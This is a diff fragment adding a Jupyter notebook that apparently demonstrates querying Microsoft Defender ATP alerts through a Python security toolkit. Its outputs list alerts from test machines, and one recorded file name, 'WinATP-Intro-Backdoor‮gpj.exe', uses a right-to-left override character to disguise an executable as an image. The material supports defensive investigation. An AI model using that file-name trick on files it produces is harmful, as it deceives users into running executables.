+       "      <td>pradeepg-win10entn-1809</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>powershell.exe</td>\n",
+       "      <td>6cbce4a295c163791b60fc23d285e6d84f28ee4c</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>162</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>38</td>\n",
+       "      <td>da637111553314888493_-215032980</td>\n",
+       "      <td>2019-12-05T16:02:02.3857966Z</td>\n",
+       "      <td>f17cf15efe963a9810a0ad1c1842db543bba8775</td>\n",
+       "      <td>pradeepg-win10entn-1809</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>notepad.exe</td>\n",
+       "      <td>b6d237154f2e528f0b503b58b025862d66b02b73</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>162</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>39</td>\n",
+       "      <td>da637111536085551266_1012263407</td>\n",
+       "      <td>2019-12-08T15:59:28.1181531Z</td>\n",
+       "      <td>f17cf15efe963a9810a0ad1c1842db543bba8775</td>\n",
+       "      <td>pradeepg-win10entn-1809</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>cmd.exe</td>\n",
+       "      <td>8c5437cd76a89ec983e3b364e219944da3dab464</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>130</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>40</td>\n",
+       "      <td>da637111536085551266_1012263407</td>\n",
+       "      <td>2019-12-08T15:59:28.1181531Z</td>\n",
+       "      <td>f17cf15efe963a9810a0ad1c1842db543bba8775</td>\n",
+       "      <td>pradeepg-win10entn-1809</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>powershell.exe</td>\n",
+       "      <td>6cbce4a295c163791b60fc23d285e6d84f28ee4c</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>130</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>41</td>\n",
+       "      <td>da637111536085551266_1012263407</td>\n",
+       "      <td>2019-12-08T17:11:14.931633Z</td>\n",
+       "      <td>f17cf15efe963a9810a0ad1c1842db543bba8775</td>\n",
+       "      <td>pradeepg-win10entn-1809</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>cmd.exe</td>\n",
+       "      <td>8c5437cd76a89ec983e3b364e219944da3dab464</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>137</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>42</td>\n",
+       "      <td>da637111536085551266_1012263407</td>\n",
+       "      <td>2019-12-08T17:11:14.931633Z</td>\n",
+       "      <td>f17cf15efe963a9810a0ad1c1842db543bba8775</td>\n",
+       "      <td>pradeepg-win10entn-1809</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>powershell.exe</td>\n",
+       "      <td>6cbce4a295c163791b60fc23d285e6d84f28ee4c</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>137</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>43</td>\n",
+       "      <td>da637111553314888493_-215032980</td>\n",
+       "      <td>2019-12-08T17:22:37.8742974Z</td>\n",
+       "      <td>f17cf15efe963a9810a0ad1c1842db543bba8775</td>\n",
+       "      <td>pradeepg-win10entn-1809</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>powershell.exe</td>\n",
+       "      <td>6cbce4a295c163791b60fc23d285e6d84f28ee4c</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>454</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                             AlertId                     EventTime  \\\n",
+       "0    da637111553314888493_-215032980  2019-12-08T17:22:37.8742974Z   \n",
+       "1   da637111470533220658_-1814166510  2019-12-05T12:34:34.7864124Z   \n",
+       "2   da637111470533220658_-1814166510  2019-12-05T12:34:34.7864124Z   \n",
+       "3    da637111448595540767_-885088719  2019-12-05T12:11:25.5486226Z   \n",
+       "4    da637111448595540767_-885088719  2019-12-05T12:11:25.5486226Z   \n",
+       "5   da637111835325717564_-1865655676  2019-12-05T16:05:46.4778106Z   \n",
+       "6   da637111835325717564_-1865655676  2019-12-05T16:05:46.4778106Z   \n",
+       "7     da637111691253610692_623907060  2019-12-05T16:50:16.9477916Z   \n",
+       "8     da637111691253610692_623907060  2019-12-05T16:50:16.9477916Z   \n",
+       "9   da637111691236503999_-1316647445  2019-12-05T16:56:18.6397738Z   \n",
+       "10  da637111691236503999_-1316647445  2019-12-05T16:56:18.6397738Z   \n",
+       "11  da637111691236503999_-1316647445  2019-12-05T16:56:18.6397738Z   \n",
+       "12  da637111691236503999_-1316647445  2019-12-05T16:56:18.6397738Z   \n",
+       "13   da637111691251815824_2024877765  2019-12-05T16:56:18.6407635Z   \n",
+       "14  da637111691256543941_-1462732472  2019-12-05T16:56:18.6407635Z   \n",
+       "15  da637111691246094719_-1324223004  2019-12-05T16:56:18.6685765Z   \n",
+       "16   da637111618734194967_-707278866  2019-12-05T16:56:18.8702258Z   \n",
+       "17   da637111691251004475_-451474344  2019-12-05T16:56:19.0725178Z   \n",
+       "18    da637111691511319089_701653122  2019-12-05T17:01:20.0899859Z   \n",
+       "19   da637111691521375847_1538423732  2019-12-05T17:01:20.0899859Z   \n",
+       "20   da637111691521375847_1538423732  2019-12-05T17:12:41.4195893Z   \n",
+       "21    da637111691511319089_701653122  2019-12-05T17:12:41.4195893Z   \n",
+       "22   da637111691521375847_1538423732  2019-12-05T17:12:41.4195893Z   \n",
+       "23  da637111691236503999_-1316647445  2019-12-05T17:12:43.2754844Z   \n",
+       "24  da637111691236503999_-1316647445  2019-12-05T17:12:43.2754844Z   \n",
+       "25  da637111691236503999_-1316647445  2019-12-05T17:12:43.2754844Z   \n",
+       "26  da637111691236503999_-1316647445  2019-12-05T17:12:43.2754844Z   \n",
+       "27  da637111691236503999_-1316647445  2019-12-05T17:12:43.2754844Z   \n",
+       "28  da637111691236503999_-1316647445  2019-12-05T17:12:43.2754844Z   \n",
+       "29   da637111691251815824_2024877765  2019-12-05T17:12:43.2822557Z   \n",
+       "30  da637111691256543941_-1462732472  2019-12-05T17:12:43.2822557Z   \n",
+       "31   da637111536085551266_1012263407  2019-12-05T14:38:34.3208724Z   \n",
+       "32   da637111536085551266_1012263407  2019-12-05T14:38:34.3208724Z   \n",
+       "33   da637111553314888493_-215032980  2019-12-05T15:06:20.3372768Z   \n",
+       "34   da637111553314888493_-215032980  2019-12-05T15:06:20.3372768Z   \n",
+       "35   da637111553314888493_-215032980  2019-12-05T15:22:44.3072402Z   \n",
+       "36   da637111553314888493_-215032980  2019-12-05T15:22:44.3072402Z   \n",
+       "37   da637111553314888493_-215032980  2019-12-05T16:02:02.3857966Z   \n",
+       "38   da637111553314888493_-215032980  2019-12-05T16:02:02.3857966Z   \n",
+       "39   da637111536085551266_1012263407  2019-12-08T15:59:28.1181531Z   \n",
+       "40   da637111536085551266_1012263407  2019-12-08T15:59:28.1181531Z   \n",
+       "41   da637111536085551266_1012263407   2019-12-08T17:11:14.931633Z   \n",
+       "42   da637111536085551266_1012263407   2019-12-08T17:11:14.931633Z   \n",
+       "43   da637111553314888493_-215032980  2019-12-08T17:22:37.8742974Z   \n",
+       "\n",
+       "                                   MachineId             ComputerName  \\\n",
+       "0   f17cf15efe963a9810a0ad1c1842db543bba8775  pradeepg-win10entn-1809   \n",
+       "1   1e9f8f18585e70ef1f167fbf5e8bf7c3dccc5739       olaa-win10pro-1607   \n",
+       "2   1e9f8f18585e70ef1f167fbf5e8bf7c3dccc5739       olaa-win10pro-1607   \n",
+       "3   499bdd5330f78dc82d0051c8d7a9eb9d69f88333    nestorw-win10pro-1803   \n",
+       "4   499bdd5330f78dc82d0051c8d7a9eb9d69f88333    nestorw-win10pro-1803   \n",
+       "5   be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "6   be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "7   be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "8   be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "9   be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "10  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "11  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "12  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "13  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "14  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "15  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "16  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "17  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "18  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "19  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "20  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "21  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "22  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "23  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "24  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "25  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "26  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "27  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "28  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "29  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "30  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "31  f17cf15efe963a9810a0ad1c1842db543bba8775  pradeepg-win10entn-1809   \n",
+       "32  f17cf15efe963a9810a0ad1c1842db543bba8775  pradeepg-win10entn-1809   \n",
+       "33  f17cf15efe963a9810a0ad1c1842db543bba8775  pradeepg-win10entn-1809   \n",
+       "34  f17cf15efe963a9810a0ad1c1842db543bba8775  pradeepg-win10entn-1809   \n",
+       "35  f17cf15efe963a9810a0ad1c1842db543bba8775  pradeepg-win10entn-1809   \n",
+       "36  f17cf15efe963a9810a0ad1c1842db543bba8775  pradeepg-win10entn-1809   \n",
+       "37  f17cf15efe963a9810a0ad1c1842db543bba8775  pradeepg-win10entn-1809   \n",
+       "38  f17cf15efe963a9810a0ad1c1842db543bba8775  pradeepg-win10entn-1809   \n",
+       "39  f17cf15efe963a9810a0ad1c1842db543bba8775  pradeepg-win10entn-1809   \n",
+       "40  f17cf15efe963a9810a0ad1c1842db543bba8775  pradeepg-win10entn-1809   \n",
+       "41  f17cf15efe963a9810a0ad1c1842db543bba8775  pradeepg-win10entn-1809   \n",
+       "42  f17cf15efe963a9810a0ad1c1842db543bba8775  pradeepg-win10entn-1809   \n",
+       "43  f17cf15efe963a9810a0ad1c1842db543bba8775  pradeepg-win10entn-1809   \n",
+       "\n",
+       "         Severity            Category  \\\n",
+       "0          Medium      DefenseEvasion   \n",
+       "1   Informational           Execution   \n",
+       "2   Informational           Execution   \n",
+       "3   Informational           Execution   \n",
+       "4   Informational           Execution   \n",
+       "5          Medium      DefenseEvasion   \n",
+       "6          Medium      DefenseEvasion   \n",
+       "7   Informational           Execution   \n",
+       "8   Informational           Execution   \n",
+       "9          Medium      DefenseEvasion   \n",
+       "10         Medium      DefenseEvasion   \n",
+       "11         Medium      DefenseEvasion   \n",
+       "12         Medium      DefenseEvasion   \n",
+       "13         Medium         Persistence   \n",
+       "14         Medium         Persistence   \n",
+       "15  Informational           Execution   \n",
+       "16            Low             Malware   \n",
+       "17  Informational             Malware   \n",
+       "18         Medium  SuspiciousActivity   \n",
+       "19         Medium           Execution   \n",
+       "20         Medium           Execution   \n",
+       "21         Medium  SuspiciousActivity   \n",
+       "22         Medium           Execution   \n",
+       "23         Medium      DefenseEvasion   \n",
+       "24         Medium      DefenseEvasion   \n",
+       "25         Medium      DefenseEvasion   \n",
+       "26         Medium      DefenseEvasion   \n",
+       "27         Medium      DefenseEvasion   \n",
+       "28         Medium      DefenseEvasion   \n",
+       "29         Medium         Persistence   \n",
+       "30         Medium         Persistence   \n",
+       "31  Informational           Execution   \n",
+       "32  Informational           Execution   \n",
+       "33         Medium      DefenseEvasion   \n",
+       "34         Medium      DefenseEvasion   \n",
+       "35         Medium      DefenseEvasion   \n",
+       "36         Medium      DefenseEvasion   \n",
+       "37         Medium      DefenseEvasion   \n",
+       "38         Medium      DefenseEvasion   \n",
+       "39  Informational           Execution   \n",
+       "40  Informational           Execution   \n",
+       "41  Informational           Execution   \n",
+       "42  Informational           Execution   \n",
+       "43         Medium      DefenseEvasion   \n",
+       "\n",
+       "                                                Title  \\\n",
+       "0               Suspicious process injection observed   \n",
+       "1      [Test Alert] Suspicious Powershell commandline   \n",
+       "2      [Test Alert] Suspicious Powershell commandline   \n",
+       "3      [Test Alert] Suspicious Powershell commandline   \n",
+       "4      [Test Alert] Suspicious Powershell commandline   \n",
+       "5               Suspicious process injection observed   \n",
+       "6               Suspicious process injection observed   \n",
+       "7      [Test Alert] Suspicious Powershell commandline   \n",
+       "8      [Test Alert] Suspicious Powershell commandline   \n",
+       "9               Suspicious process injection observed   \n",
+       "10              Suspicious process injection observed   \n",
+       "11              Suspicious process injection observed   \n",
+       "12              Suspicious process injection observed   \n",
+       "13                  Anomaly detected in ASEP registry   \n",
+       "14  An uncommon file was created and added to a Ru...   \n",
+       "15        EAF violation blocked by exploit protection   \n",
+       "16           An active 'Artoelo' malware was detected   \n",
+       "17                     'Artoelo' malware was detected   \n",
+       "18                     A suspicious file was observed   \n",
+       "19        Suspicious behavior by cmd.exe was observed   \n",
+       "20        Suspicious behavior by cmd.exe was observed   \n",
+       "21                     A suspicious file was observed   \n",
+       "22        Suspicious behavior by cmd.exe was observed   \n",
+       "23              Suspicious process injection observed   \n",
+       "24              Suspicious process injection observed   \n",
+       "25              Suspicious process injection observed   \n",
+       "26              Suspicious process injection observed   \n",
+       "27              Suspicious process injection observed   \n",
+       "28              Suspicious process injection observed   \n",
+       "29                  Anomaly detected in ASEP registry   \n",
+       "30  An uncommon file was created and added to a Ru...   \n",
+       "31     [Test Alert] Suspicious Powershell commandline   \n",
+       "32     [Test Alert] Suspicious Powershell commandline   \n",
+       "33              Suspicious process injection observed   \n",
+       "34              Suspicious process injection observed   \n",
+       "35              Suspicious process injection observed   \n",
+       "36              Suspicious process injection observed   \n",
+       "37              Suspicious process injection observed   \n",
+       "38              Suspicious process injection observed   \n",
+       "39     [Test Alert] Suspicious Powershell commandline   \n",
+       "40     [Test Alert] Suspicious Powershell commandline   \n",
+       "41     [Test Alert] Suspicious Powershell commandline   \n",
+       "42     [Test Alert] Suspicious Powershell commandline   \n",
+       "43              Suspicious process injection observed   \n",
+       "\n",
+       "                                     FileName  \\\n",
+       "0                                 notepad.exe   \n",
+       "1                              powershell.exe   \n",
+       "2                                     cmd.exe   \n",
+       "3                              powershell.exe   \n",
+       "4                                     cmd.exe   \n",
+       "5                              powershell.exe   \n",
+       "6                                 notepad.exe   \n",
+       "7                              powershell.exe   \n",
+       "8                                     cmd.exe   \n",
+       "9                           RuntimeBroker.exe   \n",
+       "10                          RuntimeBroker.exe   \n",
+       "11                          RuntimeBroker.exe   \n",
+       "12              WinATP-Intro-Backdoor‮gpj.exe   \n",
+       "13              WinATP-Intro-Backdoor‮gpj.exe   \n",
+       "14              WinATP-Intro-Backdoor‮gpj.exe   \n",
+       "15                          RuntimeBroker.exe   \n",
+       "16              WinATP-Intro-Backdoor‮gpj.exe   \n",
+       "17              WinATP-Intro-Backdoor‮gpj.exe   \n",
+       "18                             powershell.exe   \n",
+       "19                             powershell.exe   \n",
+       "20  WindowsDefenderAtpProvisioningService.exe   \n",
+       "21  WindowsDefenderAtpProvisioningService.exe   \n",
+       "22                                    cmd.exe   \n",
+       "23              WinATP-Intro-Backdoor‮gpj.exe   \n",
+       "24                          RuntimeBroker.exe   \n",
+       "25                          RuntimeBroker.exe   \n",
+       "26                          RuntimeBroker.exe   \n",
+       "27                          RuntimeBroker.exe   \n",
+       "28              WinATP-Intro-Backdoor‮gpj.exe   \n",
+       "29              WinATP-Intro-Backdoor‮gpj.exe   \n",
+       "30              WinATP-Intro-Backdoor‮gpj.exe   \n",
+       "31                             powershell.exe   \n",
+       "32                                    cmd.exe   \n",
+       "33                             powershell.exe   \n",
+       "34                                notepad.exe   \n",
+       "35                             powershell.exe   \n",
+       "36                                notepad.exe   \n",
+       "37                             powershell.exe   \n",
+       "38                                notepad.exe   \n",
+       "39                                    cmd.exe   \n",
+       "40                             powershell.exe   \n",
+       "41                                    cmd.exe   \n",
+       "42                             powershell.exe   \n",
+       "43                             powershell.exe   \n",
+       "\n",
+       "                                        SHA1 RemoteUrl RemoteIP  ReportId  \\\n",
+       "0   b6d237154f2e528f0b503b58b025862d66b02b73                          454   \n",
+       "1   044a0cf1f6bc478a7172bf207eef1e201a18ba02                         4369   \n",
+       "2   99ae9c73e9bee6f9c76d6f4093a9882df06832cf                         4369   \n",
+       "3   1b3b40fbc889fd4c645cc12c85d0805ac36ba254                        14968   \n",
+       "4   3ce71813199abae99348f61f0caa34e2574f831c                        14968   \n",
+       "5   36c5d12033b2eaf251bae61c00690ffb17fddc87                         2376   \n",
+       "6   d487580502354c61808c7180d1a336beb7ad4624                         2376   \n",
+       "7   36c5d12033b2eaf251bae61c00690ffb17fddc87                          915   \n",
+       "8   8dca9749cd48d286950e7a9fa1088c937cbccad4                          915   \n",
+       "9   7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27                         1190   \n",
+       "10  7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27                         1190   \n",
+       "11  7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27                         1190   \n",
+       "12  79c3e3cffcf57dd9913a605d5e55b2fdb8ebc4dc                         1190   \n",
+       "13  79c3e3cffcf57dd9913a605d5e55b2fdb8ebc4dc                         1187   \n",
+       "14  79c3e3cffcf57dd9913a605d5e55b2fdb8ebc4dc                         1187   \n",
+       "15  7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27                         1191   \n",
+       "16                                                                   1200   \n",
+       "17  79c3e3cffcf57dd9913a605d5e55b2fdb8ebc4dc                         1194   \n",
+       "18  36c5d12033b2eaf251bae61c00690ffb17fddc87                         1449   \n",
+       "19  36c5d12033b2eaf251bae61c00690ffb17fddc87                         1449   \n",
+       "20  2f5a566429f0df02dd0dfb45be075531f332a887                         1960   \n",
+       "21  2f5a566429f0df02dd0dfb45be075531f332a887                         1960   \n",
+       "22                                                                   1960   \n",
+       "23  79c3e3cffcf57dd9913a605d5e55b2fdb8ebc4dc                         1972   \n",
+       "24  7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27                         1972   \n",
+       "25  7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27                         1972   \n",
+       "26  7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27                         1972   \n",
+       "27  7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27                         1972   \n",
+       "28  79c3e3cffcf57dd9913a605d5e55b2fdb8ebc4dc                         1972   \n",
+       "29  79c3e3cffcf57dd9913a605d5e55b2fdb8ebc4dc                         1970   \n",
+       "30  79c3e3cffcf57dd9913a605d5e55b2fdb8ebc4dc                         1970   \n",
+       "31  6cbce4a295c163791b60fc23d285e6d84f28ee4c                           45   \n",
+       "32  8c5437cd76a89ec983e3b364e219944da3dab464                           45   \n",
+       "33  6cbce4a295c163791b60fc23d285e6d84f28ee4c                          256   \n",
+       "34  b6d237154f2e528f0b503b58b025862d66b02b73                          256   \n",
+       "35  6cbce4a295c163791b60fc23d285e6d84f28ee4c                          368   \n",
+       "36  b6d237154f2e528f0b503b58b025862d66b02b73                          368   \n",
+       "37  6cbce4a295c163791b60fc23d285e6d84f28ee4c                          162   \n",
+       "38  b6d237154f2e528f0b503b58b025862d66b02b73                          162   \n",
+       "39  8c5437cd76a89ec983e3b364e219944da3dab464                          130   \n",
+       "40  6cbce4a295c163791b60fc23d285e6d84f28ee4c                          130   \n",
+       "41  8c5437cd76a89ec983e3b364e219944da3dab464                          137   \n",
+       "42  6cbce4a295c163791b60fc23d285e6d84f28ee4c                          137   \n",
+       "43  6cbce4a295c163791b60fc23d285e6d84f28ee4c                          454   \n",
+       "\n",
+       "                    Table  \n",
+       "0              MiscEvents  \n",
+       "1   ProcessCreationEvents  \n",
+       "2   ProcessCreationEvents  \n",
+       "3   ProcessCreationEvents  \n",
+       "4   ProcessCreationEvents  \n",
+       "5              MiscEvents  \n",
+       "6              MiscEvents  \n",
+       "7   ProcessCreationEvents  \n",
+       "8   ProcessCreationEvents  \n",
+       "9              MiscEvents  \n",
+       "10             MiscEvents  \n",
+       "11             MiscEvents  \n",
+       "12             MiscEvents  \n",
+       "13         RegistryEvents  \n",
+       "14         RegistryEvents  \n",
+       "15             MiscEvents  \n",
+       "16             MiscEvents  \n",
+       "17             MiscEvents  \n",
+       "18     FileCreationEvents  \n",
+       "19     FileCreationEvents  \n",
+       "20     FileCreationEvents  \n",
+       "21     FileCreationEvents  \n",
+       "22     FileCreationEvents  \n",
+       "23             MiscEvents  \n",
+       "24             MiscEvents  \n",
+       "25             MiscEvents  \n",
+       "26             MiscEvents  \n",
+       "27             MiscEvents  \n",
+       "28             MiscEvents  \n",
+       "29         RegistryEvents  \n",
+       "30         RegistryEvents  \n",
+       "31  ProcessCreationEvents  \n",
+       "32  ProcessCreationEvents  \n",
+       "33             MiscEvents  \n",
+       "34             MiscEvents  \n",
+       "35             MiscEvents  \n",
+       "36             MiscEvents  \n",
+       "37             MiscEvents  \n",
+       "38             MiscEvents  \n",
+       "39  ProcessCreationEvents  \n",
+       "40  ProcessCreationEvents  \n",
+       "41  ProcessCreationEvents  \n",
+       "42  ProcessCreationEvents  \n",
+       "43             MiscEvents  "
+      ]
+     },
+     "execution_count": 39,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "mdatp_prov.MDATP.list_alerts()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Execute queries with custom parameters:"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 37,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>Severity</th>\n",
+       "      <th>count_</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <td>0</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>29</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>1</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>14</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>2</td>\n",
+       "      <td>Low</td>\n",
+       "      <td>1</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "        Severity  count_\n",
+       "0         Medium      29\n",
+       "1  Informational      14\n",
+       "2            Low       1"
+      ]
+     },
+     "execution_count": 37,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "mdatp_prov.MDATP.list_alerts(start=\"-30\", add_query_items=\"| summarize count() by Severity\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Print a fully constructed query for debug purposes:"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 40,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "' AlertEvents | where EventTime >= datetime(2019-12-03T23:24:40.794583Z) | where EventTime <= datetime(2020-01-02T23:24:40.794583Z) | summarize count() by Severity'"
+      ]
+     },
+     "execution_count": 40,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "mdatp_prov.MDATP.list_alerts(\"print\", start=\"-30\", add_query_items=\"| summarize count() by Severity\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Execute a custom query:"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 43,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>AlertId</th>\n",
+       "      <th>EventTime</th>\n",
+       "      <th>MachineId</th>\n",
+       "      <th>ComputerName</th>\n",
+       "      <th>Severity</th>\n",
+       "      <th>Category</th>\n",
+       "      <th>Title</th>\n",
+       "      <th>FileName</th>\n",
+       "      <th>SHA1</th>\n",
+       "      <th>RemoteUrl</th>\n",
+       "      <th>RemoteIP</th>\n",
+       "      <th>ReportId</th>\n",
+       "      <th>Table</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <td>0</td>\n",
+       "      <td>da637111553314888493_-215032980</td>\n",
+       "      <td>2019-12-08T17:22:37.8742974Z</td>\n",
+       "      <td>f17cf15efe963a9810a0ad1c1842db543bba8775</td>\n",
+       "      <td>pradeepg-win10entn-1809</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>notepad.exe</td>\n",
+       "      <td>b6d237154f2e528f0b503b58b025862d66b02b73</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>454</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>1</td>\n",
+       "      <td>da637111536085551266_1012263407</td>\n",
+       "      <td>2019-12-08T17:11:14.931633Z</td>\n",
+       "      <td>f17cf15efe963a9810a0ad1c1842db543bba8775</td>\n",
+       "      <td>pradeepg-win10entn-1809</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>cmd.exe</td>\n",
+       "      <td>8c5437cd76a89ec983e3b364e219944da3dab464</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>137</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>2</td>\n",
+       "      <td>da637111470533220658_-1814166510</td>\n",
+       "      <td>2019-12-05T12:34:34.7864124Z</td>\n",
+       "      <td>1e9f8f18585e70ef1f167fbf5e8bf7c3dccc5739</td>\n",
+       "      <td>olaa-win10pro-1607</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>cmd.exe</td>\n",
+       "      <td>99ae9c73e9bee6f9c76d6f4093a9882df06832cf</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>4369</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>3</td>\n",
+       "      <td>da637111448595540767_-885088719</td>\n",
+       "      <td>2019-12-05T12:11:25.5486226Z</td>\n",
